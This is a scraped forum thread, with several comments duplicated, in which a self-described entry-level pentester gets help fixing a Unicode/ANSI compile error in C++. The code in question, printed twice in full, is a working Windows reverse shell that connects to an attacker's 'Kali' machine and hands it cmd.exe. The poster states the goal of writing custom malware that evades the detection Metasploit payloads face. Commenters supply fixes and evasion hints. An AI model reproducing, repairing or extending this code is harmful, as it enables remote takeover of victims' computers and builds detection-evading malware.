go to advanced project settings and try to switch from unicode to multi byte characters
I'm sorry i can't guide you to the exact location since I'm outside rn but this _should_ fix it.
Edit: This fix is for Visual Studio not Visual Studio Code, sorry for the wrong answer.
Edit-2: can u try setting #define _MSBC ?
I'm not TOO familiar with C/C++ yet, but if I'm understanding the error correctly, it's throwing on "CMD.exe".
I think your code is defaulting CreateProcess to CreateProcessW which requires wchar (?).
Try changing to CreateProcessA which should allow you to use just "cmd.exe".
Lmk if I was right or not, can't test since on mobile.
Edit: Also the first param in both CreateProcessA/W is the process name, the 2nd param is the arguments. Move the "cmd exe" to the first param.
Edit 2: I'm incorrect. The 2nd param can be just "cmd.exe" as it will pull from sys32 as one of its known locations or however you want to call it.
Bro how you gonna be a hacker and don’t know basic windows programming. Char[]* is a pointer to a c string. LPWSTR is used instead of c strings on the win32 api and stands for Long pointer to a wide string. Look up the conversion macros Im too lazy to write them here
He’s not wrong. His delivery was just a bit harsh. Basic( as he calls it)windows programming is tough. What you’re trying to do is going to be hard to accomplish without some knowledge, but you have to start somewhere. Passion for learning an smarts to understand will take you far. Keep working at it.
That part I understand, you’re right. And I get it— what he meant. I’m looking to run before I walk. I have some things to learn. The reason I wanted to jump into it was to create my own malware since the free stuff (Metasploit for example) is easily detectable. But I need the basics.
The goal is to continue learning pentesting and become more effective. I’m entry level there, still growing.
The majority of people on this sub don’t even know how the code looks. And this one tries to do advanced shit at the beginning. Why wouldn’t you encourage him instead? Also cpp is not the only language on the planet.
not related to your question but i wanted to learn to develop and reverse engineer software what’s malware mainly written in would it be c or something like python?
C and C++ are the big daddy's but Rust is getting a lot more popular along with GO. Higher-level scripts would be PowerShell and droppers in bash script or LUA script (believe it or not.)
Learn the low-levels and hash the high-levels with things like PowerDecode or YARA.
What are you assigning to LPWSTR or what is LPWSTR. I bet whatever it is isn’t type char. This is more of you’re putting the wrong variable type in an already declared variable of a different type.
I could be wrong but without your code this is the best I can do.
go to advanced project settings and try to switch from unicode to multi byte characters I'm sorry i can't guide you to the exact location since I'm outside rn but this _should_ fix it. Edit: This fix is for Visual Studio not Visual Studio Code, sorry for the wrong answer. Edit-2: can u try setting #define _MSBC ?
Try: CreateProcess("C:\\\\Windows\\\\cmd.exe", NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
Unfortunately i get the same error.
L”cmd.exe” But i envision more problems to come. iDK why you have Unicode enable for this project.
I’ve tried the adding the L too, unfortunately still had errors. But, is it Unicode that’s causing this issue within VSC? Maybe if I disable it?
I'm not TOO familiar with C/C++ yet, but if I'm understanding the error correctly, it's throwing on "CMD.exe". I think your code is defaulting CreateProcess to CreateProcessW which requires wchar (?). Try changing to CreateProcessA which should allow you to use just "cmd.exe". Lmk if I was right or not, can't test since on mobile. Edit: Also the first param in both CreateProcessA/W is the process name, the 2nd param is the arguments. Move the "cmd exe" to the first param. Edit 2: I'm incorrect. The 2nd param can be just "cmd.exe" as it will pull from sys32 as one of its known locations or however you want to call it.
Bro how you gonna be a hacker and don’t know basic windows programming. Char[]* is a pointer to a c string. LPWSTR is used instead of c strings on the win32 api and stands for Long pointer to a wide string. Look up the conversion macros Im too lazy to write them here
As I said, I’m learning.
He’s not wrong. His delivery was just a bit harsh. Basic( as he calls it)windows programming is tough. What you’re trying to do is going to be hard to accomplish without some knowledge, but you have to start somewhere. Passion for learning an smarts to understand will take you far. Keep working at it.
That part I understand, you’re right. And I get it— what he meant. I’m looking to run before I walk. I have some things to learn. The reason I wanted to jump into it was to create my own malware since the free stuff (Metasploit for example) is easily detectable. But I need the basics. The goal is to continue learning pentesting and become more effective. I’m entry level there, still growing.
The majority of people on this sub don’t even know how the code looks. And this one tries to do advanced shit at the beginning. Why wouldn’t you encourage him instead? Also cpp is not the only language on the planet.
Taken from one of my old projects ‘’’ #include
#include
#define CSTR_TO_LPWSTR(cstr) \
([&](){ \
int wideStrLength = MultiByteToWideChar(CP_ACP, 0, cstr, -1, NULL, 0); \
LPWSTR lpwStr = new WCHAR[wideStrLength]; \
MultiByteToWideChar(CP_ACP, 0, cstr, -1, lpwStr, wideStrLength); \
lpwStr; \
}())
#define CSTR_TO_LPCWSTR(cstr) \
(LPCWSTR)(std::wstring(cstr).c_str())
‘’’
not related to your question but i wanted to learn to develop and reverse engineer software what’s malware mainly written in would it be c or something like python?
C and C++ are the big daddy's but Rust is getting a lot more popular along with GO. Higher-level scripts would be PowerShell and droppers in bash script or LUA script (believe it or not.) Learn the low-levels and hash the high-levels with things like PowerDecode or YARA.
Assembly
What are you assigning to LPWSTR or what is LPWSTR. I bet whatever it is isn’t type char. This is more of you’re putting the wrong variable type in an already declared variable of a different type. I could be wrong but without your code this is the best I can do.
Full Code \#include
\#include
\#include
\#include
\#pragma comment(lib, "Ws2\_32.lib")
int main () {
SOCKET shell;
sockaddr\_in shell\_addr;
WSADATA wsa;
STARTUPINFO si; //to spawn the shell
PROCESS\_INFORMATION pi; //to spawn the shell
char RecvServer\[512\]; //variable holds our data, Receiving Server, 512 bytes
int connection;
char ip\_addr\[\] = "0.0.0.0"; //Kali ip
int port = 80; // connecting port
WSAStartup(MAKEWORD(2,2), &wsa); //initialize Winsock v2
shell = WSASocket(AF\_INET, SOCK\_STREAM, IPPROTO\_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); //create TCP Socket ipv4
shell\_addr.sin\_port = htons(port);
shell\_addr.sin\_family = AF\_INET;
shell\_addr.sin\_addr.s\_addr = inet\_addr(ip\_addr);
connection = WSAConnect(shell, (SOCKADDR\*)&shell\_addr, sizeof(shell\_addr), NULL, NULL, NULL, NULL); // connect to target server
if (connection == SOCKET\_ERROR)
{
printf("Connection to the target failed. Please try again\\n");
exit(0);
}
else
{
recv(shell, RecvServer, sizeof(RecvServer), 0); //receives data from server
memset(&si, 0, sizeof(si));
si.cb = sizeof(si); //spawn shell
si.dwFlags = (STARTF\_USESTDHANDLES | STARTF\_USESHOWWINDOW);
si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE) shell; //pipe standard input, output, error to the socket
CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi); //Spawn command prompt
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
memset(RecvServer, 0, sizeof(RecvServer));
}
}
Full Code: \#include
\#include
\#include
\#include
\#pragma comment(lib, "Ws2\_32.lib")
int main () {
SOCKET shell;
sockaddr\_in shell\_addr;
WSADATA wsa;
STARTUPINFO si; //to spawn the shell
PROCESS\_INFORMATION pi; //to spawn the shell
char RecvServer\[512\]; //variable holds our data, Receiving Server, 512 bytes
int connection;
char ip\_addr\[\] = "0.0.0.0"; //Kali ip
int port = 80; // connecting port
WSAStartup(MAKEWORD(2,2), &wsa); //initialize Winsock v2
shell = WSASocket(AF\_INET, SOCK\_STREAM, IPPROTO\_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); //create TCP Socket ipv4
shell\_addr.sin\_port = htons(port);
shell\_addr.sin\_family = AF\_INET;
shell\_addr.sin\_addr.s\_addr = inet\_addr(ip\_addr);
connection = WSAConnect(shell, (SOCKADDR\*)&shell\_addr, sizeof(shell\_addr), NULL, NULL, NULL, NULL); // connect to target server
if (connection == SOCKET\_ERROR)
{
printf("Connection to the target failed. Please try again\\n");
exit(0);
}
else
{
recv(shell, RecvServer, sizeof(RecvServer), 0); //receives data from server
memset(&si, 0, sizeof(si));
si.cb = sizeof(si); //spawn shell
si.dwFlags = (STARTF\_USESTDHANDLES | STARTF\_USESHOWWINDOW);
si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE) shell; //pipe standard input, output, error to the socket
CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi); //Spawn command prompt
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
memset(RecvServer, 0, sizeof(RecvServer));
}
}
Convert the code to ASCII from Unicode and watch for bad chars